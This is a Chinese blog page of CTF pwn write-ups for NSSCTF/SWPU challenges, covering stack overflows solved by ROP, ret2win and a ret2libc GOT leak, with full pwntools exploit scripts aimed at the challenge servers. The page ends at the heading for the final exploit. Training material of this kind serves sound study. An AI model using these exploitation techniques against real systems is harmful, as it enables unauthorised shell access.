

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.png">
  <link rel="icon" href="/img/icon.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Gh0stF0xy">
  <meta name="keywords" content="">
  
    <meta name="description" content="[GFCTF 2021]where_is_shellchecksec一下 123456Arch:       amd64-64-little  RELRO:      Partial RELRO  Stack:      No canary found  NX:         NX enabled  PIE:        No PIE (0x400000)  Stripped:   No  6">
<meta property="og:type" content="article">
<meta property="og:title" content="NSSCTF中的SWPU刷题记录">
<meta property="og:url" content="https://www.ghostfoxy.cn/2025/11/16/SWPU/index.html">
<meta property="og:site_name" content="GhostFoxy&#39;s 网安世界">
<meta property="og:description" content="[GFCTF 2021]where_is_shellchecksec一下 123456Arch:       amd64-64-little  RELRO:      Partial RELRO  Stack:      No canary found  NX:         NX enabled  PIE:        No PIE (0x400000)  Stripped:   No  6">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.ghostfoxy.cn/banner/3.png">
<meta property="article:published_time" content="2025-11-16T12:58:03.000Z">
<meta property="article:modified_time" content="2025-11-19T12:59:03.416Z">
<meta property="article:author" content="Gh0stF0xy">
<meta property="article:tag" content="pwn,题解,write-up">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://www.ghostfoxy.cn/banner/3.png">
  
  
  
  <title>NSSCTF中的SWPU刷题记录 - GhostFoxy&#39;s 网安世界</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">
<link rel="stylesheet" href="/css/scrollAnimation.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.ghostfoxy.cn","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>GhostFoxy - 技术丿硅の谷</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/wallpaper.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="NSSCTF中的SWPU刷题记录"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-11-16 20:58" pubdate>
          2025年11月16日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          22 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">NSSCTF中的SWPU刷题记录</h1>
            
              <p id="updated-time" class="note note-info" style="display: none">
                
                  
                    本文最后更新于 2025-11-19T20:59:03+08:00
                  
                  

                
              </p>
            
            
              <div class="markdown-body">
                
                <h3 id="GFCTF-2021-where-is-shell"><a href="#GFCTF-2021-where-is-shell" class="headerlink" title="[GFCTF 2021]where_is_shell"></a>[GFCTF 2021]where_is_shell</h3><p>checksec一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x400000)<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位程序，有NX保护，栈不可执行，无法使用shellcode</p>
<p>查看源代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  _BYTE buf[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-10h] BYREF</span><br><br>  system(<span class="hljs-string">&quot;echo &#x27;zltt lost his shell, can you find it?&#x27;&quot;</span>);<br>  read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0x38u</span>LL);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>明显的栈溢出。</p>
<p>看到有system函数，可以想到调用system(“&#x2F;bin&#x2F;sh”)</p>
<p>尝试寻找”&#x2F;bin&#x2F;sh”串：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary shell --string &quot;/bin/sh&quot;<br></code></pre></td></tr></table></figure>

<p>没有找到，那怎么办？</p>
<p>这里就需要一个<strong>新的知识点</strong>：<em>调用system(0)也可以达到拿到shell的效果</em>。</p>
<p>因为栈不可执行，所以我们不能写入0，只能找现有的。</p>
<p>查看函数tips()：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C">__int64 <span class="hljs-title function_">tips</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> MEMORY[<span class="hljs-number">0x403569</span>]();<br>&#125;<br></code></pre></td></tr></table></figure>

<p>查看汇编，发现这里有一段机器码为：24 30 这个机器码对应着$0</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs assembly">.text:0000000000400540 E8 24 30 00 00                 call    near ptr 403569h<br></code></pre></td></tr></table></figure>

<p>所以可以调用地址：0x400541来当作$0</p>
<p>偏移量：0x10 + 0x8</p>
<p>寻找system(),pop_rdi和ret的地址：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">(gdb)p &amp;system<br><span class="hljs-meta prompt_">$</span><span class="language-bash">1 = (&lt;text variable, no debug info&gt; *) 0x400430 &lt;system@plt&gt;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary shell --only &quot;pop|ret&quot; | grep rdi<br>0x00000000004005e3 : pop rdi ; ret<br></code></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary shell --only &quot;ret&quot;<br>Gadgets information<br>============================================================<br>0x0000000000400416 : ret<br><br>Unique gadgets found: 1<br></code></pre></td></tr></table></figure>

<p>可知system函数,pop_rdi和ret的地址分别是0x400430,0x4005e3,0x400416</p>
<p>构造exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="hljs-number">28234</span>)<br>offset = <span class="hljs-number">0x10</span> + <span class="hljs-number">0x8</span><br>system_addr = <span class="hljs-number">0x400430</span><br>ret_addr = <span class="hljs-number">0x400416</span><br>sh_addr = <span class="hljs-number">0x400541</span><br>pop_rdi = <span class="hljs-number">0x4005e3</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(pop_rdi) + p64(sh_addr) + p64(ret_addr) + p64(system_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行代码，拿到shell</p>
<h3 id="NSSCTF-2022-Spring-Recruit-R3m4ke"><a href="#NSSCTF-2022-Spring-Recruit-R3m4ke" class="headerlink" title="[NSSCTF 2022 Spring Recruit]R3m4ke?"></a>[NSSCTF 2022 Spring Recruit]R3m4ke?</h3><p>checksec一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x400000)<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位程序，NX开启，栈不可执行。</p>
<p>IDA查看源码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  _BYTE v4[<span class="hljs-number">32</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-20h] BYREF</span><br><br>  init(argc, argv, envp);<br>  NSS();<br>  <span class="hljs-keyword">return</span> gets(v4);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>明显栈溢出。</p>
<p>NSS函数就是显示一些无用信息，查看函数列表发现有个后门函数LookAtMe：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">LookAtMe</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>直接给了shell，那就很好办了</p>
<p>偏移量：0x20 + 0x8</p>
<p>查找LookAtMe和ret的地址</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">(gdb)p &amp;LookAtMe<br><span class="hljs-meta prompt_">$</span><span class="language-bash">1 = (&lt;text variable, no debug info&gt; *) 0x40072c &lt;LookAtMe&gt;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary r3m4ke1t --only &quot;ret&quot;<br>Gadgets information<br>============================================================<br>0x000000000040057e : ret<br><br>Unique gadgets found: 1<br></code></pre></td></tr></table></figure>

<p>地址分别是：0x40072c,0x40057e</p>
<p>构造exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="hljs-number">28397</span>)<br>offset = <span class="hljs-number">0x20</span> + <span class="hljs-number">0x8</span><br>sh_addr = <span class="hljs-number">0x40072c</span><br>ret_addr = <span class="hljs-number">0x40057e</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(ret_addr) + p64(sh_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序拿到shell。</p>
<h3 id="SWPUCTF-2022-新生赛-有手就行的栈溢出"><a href="#SWPUCTF-2022-新生赛-有手就行的栈溢出" class="headerlink" title="[SWPUCTF 2022 新生赛]有手就行的栈溢出"></a>[SWPUCTF 2022 新生赛]有手就行的栈溢出</h3><p>checksec一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x400000)<br>  SHSTK:      Enabled #影子堆栈备份返回地址，函数返回时进行校验，防止ROP攻击<br>  IBT:        Enabled #间接分支跟踪，要求所有简介跳转的目标必须是一条函数指令。防止JOP/COP攻击<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位二进制程序，NX开启，无法使用shellcode。SHSTK和IBT开启，无法使用ROP，JOP和COP攻击</p>
<p>查看源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  init(argc, argv, envp);<br>  <span class="hljs-built_in">puts</span>(s);<br>  overflow();<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs C">__int64 <span class="hljs-title function_">overflow</span><span class="hljs-params">()</span><br>&#123;<br>  _BYTE v1[<span class="hljs-number">32</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-20h] BYREF</span><br><br>  gets(v1);<span class="hljs-comment">//危险函数，引发栈溢出</span><br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs C">__int64 <span class="hljs-title function_">gift</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Are you kidding?&quot;</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;system(&#x27;/bin/sh&#x27;)&quot;</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">fun</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-type">char</span> *argv[<span class="hljs-number">2</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-10h] BYREF</span><br><br>  argv[<span class="hljs-number">0</span>] = <span class="hljs-string">&quot;/bin/sh&quot;</span>;<br>  argv[<span class="hljs-number">1</span>] = <span class="hljs-number">0LL</span>;<br>  <span class="hljs-keyword">return</span> execve(<span class="hljs-string">&quot;/bin/sh&quot;</span>, argv, <span class="hljs-number">0LL</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到main函数调用了overflow函数，该函数包含危险函数gets，会导致引发栈溢出</p>
<p>存在两个后门：gift和fun。gift是一个假的调用shell的函数，而fun是真的,利用execve调用shell。</p>
<p>execve系统调用会用新的程序映像完全替换当前进程的内存空间，包括影子栈。这意味着在成功调用execve的瞬间，旧的、受保护的执行环境就被全新的环境所取代，影子栈的防御也就不复存在了，所以当看到有SHSTK保护机制时，利用系统调用execve是一个非常好的策略，本题是拿了一个简单的例子作为举例</p>
<p>计算偏移量：0x20 + 0x8</p>
<p>查找fun函数的地址：0x401257</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">p fun</span><br><span class="hljs-meta prompt_">$</span><span class="language-bash">1 = &#123;&lt;text variable, no debug info&gt;&#125; 0x401257 &lt;fun&gt;</span><br></code></pre></td></tr></table></figure>

<p>查找ret地址：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary pwn --only &quot;ret&quot;<br>Gadgets information<br>============================================================<br>0x000000000040101a : ret<br><br>Unique gadgets found: 1<br></code></pre></td></tr></table></figure>

<p>查找到地址：0x40101a</p>
<p>编写exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&#x27;node5.anna.nssctf.cn&#x27;</span>,<span class="hljs-number">21716</span>)<br>offset = <span class="hljs-number">0x20</span> + <span class="hljs-number">0x8</span><br>fun_addr = <span class="hljs-number">0x401257</span><br>ret_addr = <span class="hljs-number">0x40101a</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(ret_addr) + p64(fun_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序，成功拿到了shell</p>
<h3 id="SWPUCTF-2021-新生赛-whitegive-pwn"><a href="#SWPUCTF-2021-新生赛-whitegive-pwn" class="headerlink" title="[SWPUCTF 2021 新生赛]whitegive_pwn"></a>[SWPUCTF 2021 新生赛]whitegive_pwn</h3><p>checksec 一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x400000)<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位程序，NX保护开启</p>
<p>查看源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs C">__int64 <span class="hljs-title function_">vuln</span><span class="hljs-params">()</span><br>&#123;<br>  _BYTE v1[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-10h] BYREF</span><br><br>  <span class="hljs-keyword">return</span> gets(v1);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>看了一圈，没有system也没有&#x2F;bin&#x2F;sh</p>
<p>考虑用ret2libc求解</p>
<p>思路：利用puts函数泄露puts函数的真实地址（函数在got表中的地址），计算libc基地址后找到system和&#x2F;bin&#x2F;sh的地址</p>
<p>第一步：泄漏puts的真实地址</p>
<p>构造payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">payload1 = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(pop_rdi) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)<br></code></pre></td></tr></table></figure>

<p>64位的程序，函数的前6个参数存放在寄存器里。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs assembly">pop rdi ; ret<br></code></pre></td></tr></table></figure>

<p>这条汇编是将栈上下一个值(puts在got表中的地址)弹入rdi寄存器，ret跳转栈上指定的下一个地址（puts_plt_addr的值，因为在栈上被放在了puts_got_addr的后面）。汇编代码执行完后，下一个就是返回地址。所以返回main函数继续执行第二次攻击。</p>
<p>所以先写一个泄漏puts真实地址的exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node7.anna.nssctf.cn&quot;</span>,<span class="hljs-number">28828</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./white_give&#x27;</span>)<br>offset = <span class="hljs-number">0x10</span> + <span class="hljs-number">0x8</span><br>puts_plt_addr = elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_got_addr = elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>main_addr = <span class="hljs-number">0x4006d6</span><br>pop_rdi = <span class="hljs-number">0x400763</span><br>ret_addr = <span class="hljs-number">0x400509</span><br>payload1 = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(pop_rdi) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)<br>p.sendline(payload1)<br>puts_addr = p.recvline()<br><span class="hljs-built_in">print</span>(puts_addr)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>拿到输出结果：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">b&#x27;\xa0\x86\xc5_k\x7f\n&#x27;<br></code></pre></td></tr></table></figure>

<p>处理输出结果：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">puts_addr = u64(p.recvuntil(<span class="hljs-string">b&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br></code></pre></td></tr></table></figure>

<p>找到libc正确版本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">libc = LibcSearcher(<span class="hljs-string">&quot;puts&quot;</span>, puts_addr)<br></code></pre></td></tr></table></figure>

<p>偏移地址：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">libc_base = puts_addr - libc.dump(<span class="hljs-string">&#x27;puts&#x27;</span>)<br>system_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>bin_sh_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>完整exp：</p>
